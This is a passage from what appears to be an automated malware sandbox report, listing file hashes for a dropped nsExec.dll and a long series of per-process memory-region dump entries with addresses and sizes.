                                                      d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                      SHA512

                                                      3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                    • \Users\Admin\AppData\Local\Temp\nsn93B9.tmp\nsExec.dll
                                                      MD5

                                                      1139fb5cc942e668c8277f8b8f1e5f20

                                                      SHA1

                                                      94bbb2454dad420b70553c0fca4899f120d3ed43

                                                      SHA256

                                                      9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                      SHA512

                                                      08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                    • memory/296-94-0x0000000074611000-0x0000000074613000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/296-83-0x0000000000000000-mapping.dmp
                                                    • memory/296-91-0x00000000003C0000-0x00000000003C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/616-108-0x000007FEF23A0000-0x000007FEF3436000-memory.dmp
                                                      Filesize

                                                      16.6MB

                                                    • memory/616-111-0x0000000000A90000-0x0000000000A92000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/616-103-0x0000000000000000-mapping.dmp
                                                    • memory/616-115-0x0000000000A96000-0x0000000000AB5000-memory.dmp
                                                      Filesize

                                                      124KB

                                                    • memory/856-75-0x0000000000AF0000-0x0000000000AF2000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/856-72-0x0000000000000000-mapping.dmp
                                                    • memory/872-146-0x0000000000BD0000-0x0000000000C40000-memory.dmp
                                                      Filesize

                                                      448KB

                                                    • memory/872-145-0x0000000000870000-0x00000000008BB000-memory.dmp
                                                      Filesize

                                                      300KB

                                                    • memory/960-79-0x0000000000400000-0x0000000000416000-memory.dmp
                                                      Filesize

                                                      88KB

                                                    • memory/960-76-0x0000000000000000-mapping.dmp
                                                    • memory/1208-212-0x0000000004140000-0x0000000004155000-memory.dmp
                                                      Filesize

                                                      84KB

                                                    • memory/1208-214-0x00000000047B0000-0x00000000047C7000-memory.dmp
                                                      Filesize

                                                      92KB

                                                    • memory/1316-107-0x000007FEF23A0000-0x000007FEF3436000-memory.dmp
                                                      Filesize

                                                      16.6MB

                                                    • memory/1316-100-0x0000000000000000-mapping.dmp
                                                    • memory/1316-120-0x00000000009F5000-0x00000000009F6000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1316-118-0x0000000001360000-0x0000000001379000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/1316-109-0x00000000009D0000-0x00000000009D2000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1316-117-0x00000000009D6000-0x00000000009F5000-memory.dmp
                                                      Filesize

                                                      124KB

                                                    • memory/1496-113-0x0000000000000000-mapping.dmp
                                                    • memory/1784-112-0x0000000000000000-mapping.dmp
                                                    • memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1820-61-0x0000000000400000-0x000000000042B000-memory.dmp
                                                      Filesize

                                                      172KB

                                                    • memory/1940-88-0x0000000000000000-mapping.dmp
                                                    • memory/1940-92-0x0000000002050000-0x0000000002052000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/2036-70-0x0000000000240000-0x0000000000241000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2036-63-0x0000000000000000-mapping.dmp
                                                    • memory/2300-303-0x0000000000000000-mapping.dmp
                                                    • memory/2300-304-0x00000000048F0000-0x00000000048F1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2300-305-0x00000000048F2000-0x00000000048F3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2388-306-0x0000000000000000-mapping.dmp
                                                    • memory/2660-154-0x0000000000000000-mapping.dmp
                                                    • memory/2844-307-0x0000000000000000-mapping.dmp
                                                    • memory/3016-156-0x0000000000000000-mapping.dmp
                                                    • memory/3108-308-0x0000000000000000-mapping.dmp
                                                    • memory/3996-309-0x0000000000000000-mapping.dmp
                                                    • memory/4020-310-0x0000000000000000-mapping.dmp
                                                    • memory/4436-311-0x0000000000000000-mapping.dmp
                                                    • memory/4588-295-0x0000000000000000-mapping.dmp
                                                    • memory/4624-296-0x0000000000000000-mapping.dmp
                                                    • memory/4716-299-0x00000000048C2000-0x00000000048C3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/4716-298-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/4716-297-0x0000000000000000-mapping.dmp
                                                    • memory/5020-300-0x0000000000000000-mapping.dmp
                                                    • memory/5020-301-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/5020-302-0x0000000004A42000-0x0000000004A43000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/5172-159-0x0000000000000000-mapping.dmp
                                                    • memory/5224-313-0x0000000000000000-mapping.dmp
                                                    • memory/5324-162-0x0000000000000000-mapping.dmp
                                                    • memory/5324-166-0x0000000000240000-0x0000000000250000-memory.dmp
                                                      Filesize

                                                      64KB

                                                    • memory/5324-167-0x0000000000280000-0x0000000000292000-memory.dmp
                                                      Filesize

                                                      72KB

                                                    • memory/5344-314-0x0000000000000000-mapping.dmp
                                                    • memory/5424-312-0x0000000000000000-mapping.dmp
                                                    • memory/5448-165-0x0000000000000000-mapping.dmp
                                                    • memory/5556-315-0x0000000000000000-mapping.dmp
                                                    • memory/5572-168-0x0000000000000000-mapping.dmp
                                                    • memory/5588-169-0x0000000000000000-mapping.dmp
                                                    • memory/7660-170-0x0000000000000000-mapping.dmp
                                                    • memory/7672-172-0x0000000000000000-mapping.dmp
                                                    • memory/7760-176-0x0000000000000000-mapping.dmp
                                                    • memory/7800-193-0x00000000003A0000-0x00000000003AC000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/7800-178-0x0000000000000000-mapping.dmp
                                                    • memory/7828-180-0x0000000000000000-mapping.dmp
                                                    • memory/7860-195-0x0000000000400000-0x00000000004A8000-memory.dmp
                                                      Filesize

                                                      672KB

                                                    • memory/7860-192-0x0000000000220000-0x0000000000229000-memory.dmp
                                                      Filesize

                                                      36KB

                                                    • memory/7860-182-0x0000000000000000-mapping.dmp
                                                    • memory/7884-184-0x0000000000000000-mapping.dmp
                                                    • memory/7928-209-0x0000000002A30000-0x000000000333B000-memory.dmp
                                                      Filesize

                                                      9.0MB

                                                    • memory/7928-210-0x0000000000400000-0x0000000000D25000-memory.dmp
                                                      Filesize

                                                      9.1MB

                                                    • memory/7928-186-0x0000000000000000-mapping.dmp
                                                    • memory/8036-196-0x0000000000400000-0x000000000040C000-memory.dmp
                                                      Filesize

                                                      48KB

                                                    • memory/8036-197-0x0000000000402F68-mapping.dmp
                                                    • memory/8088-227-0x00000000062A0000-0x00000000062A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-234-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-203-0x0000000000000000-mapping.dmp
                                                    • memory/8088-220-0x0000000006160000-0x0000000006161000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-222-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-226-0x00000000061A0000-0x00000000061A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-213-0x00000000048F0000-0x00000000048F1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-206-0x0000000000540000-0x0000000000541000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-235-0x00000000064D0000-0x00000000064D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-205-0x0000000004940000-0x0000000004941000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-211-0x0000000002550000-0x0000000002551000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-207-0x0000000004980000-0x0000000004981000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8088-208-0x0000000004942000-0x0000000004943000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8532-216-0x0000000000000000-mapping.dmp
                                                    • memory/8896-243-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-245-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-246-0x00000000062E0000-0x00000000062E1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-241-0x00000000026C0000-0x00000000026C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-239-0x0000000004B20000-0x0000000004B21000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-238-0x00000000009A0000-0x00000000009A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/8896-236-0x0000000000000000-mapping.dmp
                                                    • memory/8896-244-0x0000000004AE2000-0x0000000004AE3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-252-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-254-0x00000000028B0000-0x00000000028B1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-255-0x0000000006270000-0x0000000006271000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-253-0x0000000004A22000-0x0000000004A23000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-251-0x00000000026A0000-0x00000000026A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-250-0x0000000004A60000-0x0000000004A61000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-249-0x0000000002330000-0x0000000002331000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9268-247-0x0000000000000000-mapping.dmp
                                                    • memory/9548-256-0x0000000000000000-mapping.dmp
                                                    • memory/9548-263-0x0000000004830000-0x0000000004831000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-264-0x0000000005830000-0x0000000005831000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-262-0x0000000002600000-0x0000000002601000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-261-0x00000000049F2000-0x00000000049F3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-260-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-259-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9548-258-0x00000000024E0000-0x00000000024E1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9804-270-0x0000000002810000-0x000000000345A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/9804-269-0x0000000002810000-0x000000000345A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/9804-265-0x0000000000000000-mapping.dmp
                                                    • memory/9808-121-0x0000000000000000-mapping.dmp
                                                    • memory/9932-272-0x0000000004980000-0x0000000004981000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9932-273-0x0000000004982000-0x0000000004983000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/9932-271-0x0000000000000000-mapping.dmp
                                                    • memory/9960-127-0x0000000000430000-0x0000000000442000-memory.dmp
                                                      Filesize

                                                      72KB

                                                    • memory/9960-126-0x0000000000250000-0x0000000000260000-memory.dmp
                                                      Filesize

                                                      64KB

                                                    • memory/9960-123-0x0000000000000000-mapping.dmp
                                                    • memory/10104-274-0x0000000000000000-mapping.dmp
                                                    • memory/10104-276-0x0000000002020000-0x0000000002C6A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/10104-275-0x0000000002020000-0x0000000002C6A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/10236-277-0x0000000000000000-mapping.dmp
                                                    • memory/11912-128-0x0000000000000000-mapping.dmp
                                                    • memory/11972-130-0x0000000000000000-mapping.dmp
                                                    • memory/12012-278-0x0000000000000000-mapping.dmp
                                                    • memory/12036-143-0x00000000005B0000-0x00000000006B1000-memory.dmp
                                                      Filesize

                                                      1.0MB

                                                    • memory/12036-144-0x00000000001D0000-0x000000000022C000-memory.dmp
                                                      Filesize

                                                      368KB

                                                    • memory/12036-133-0x0000000000000000-mapping.dmp
                                                    • memory/12036-142-0x0000000010000000-0x0000000010002000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/12124-279-0x0000000000000000-mapping.dmp
                                                    • memory/12216-141-0x00000000FF7F246C-mapping.dmp
                                                    • memory/12216-188-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/12216-148-0x0000000000480000-0x00000000004F0000-memory.dmp
                                                      Filesize

                                                      448KB

                                                    • memory/12216-189-0x0000000002B50000-0x0000000002C4F000-memory.dmp
                                                      Filesize

                                                      1020KB

                                                    • memory/12296-280-0x0000000000000000-mapping.dmp
                                                    • memory/12296-282-0x0000000001F30000-0x0000000002B7A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/12372-149-0x0000000000000000-mapping.dmp
                                                    • memory/12396-285-0x00000000049C2000-0x00000000049C3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/12396-283-0x0000000000000000-mapping.dmp
                                                    • memory/12396-284-0x00000000049C0000-0x00000000049C1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/12440-151-0x0000000000000000-mapping.dmp
                                                    • memory/12472-286-0x0000000000000000-mapping.dmp
                                                    • memory/12472-287-0x00000000047E0000-0x00000000047E1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/12472-288-0x00000000047E2000-0x00000000047E3000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/12968-291-0x00000000026D0000-0x000000000331A000-memory.dmp
                                                      Filesize

                                                      12.3MB

                                                    • memory/12968-289-0x0000000000000000-mapping.dmp
                                                    • memory/13164-294-0x0000000004912000-0x0000000004913000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/13164-292-0x0000000000000000-mapping.dmp
                                                    • memory/13164-293-0x0000000004910000-0x0000000004911000-memory.dmp
                                                      Filesize

                                                      4KB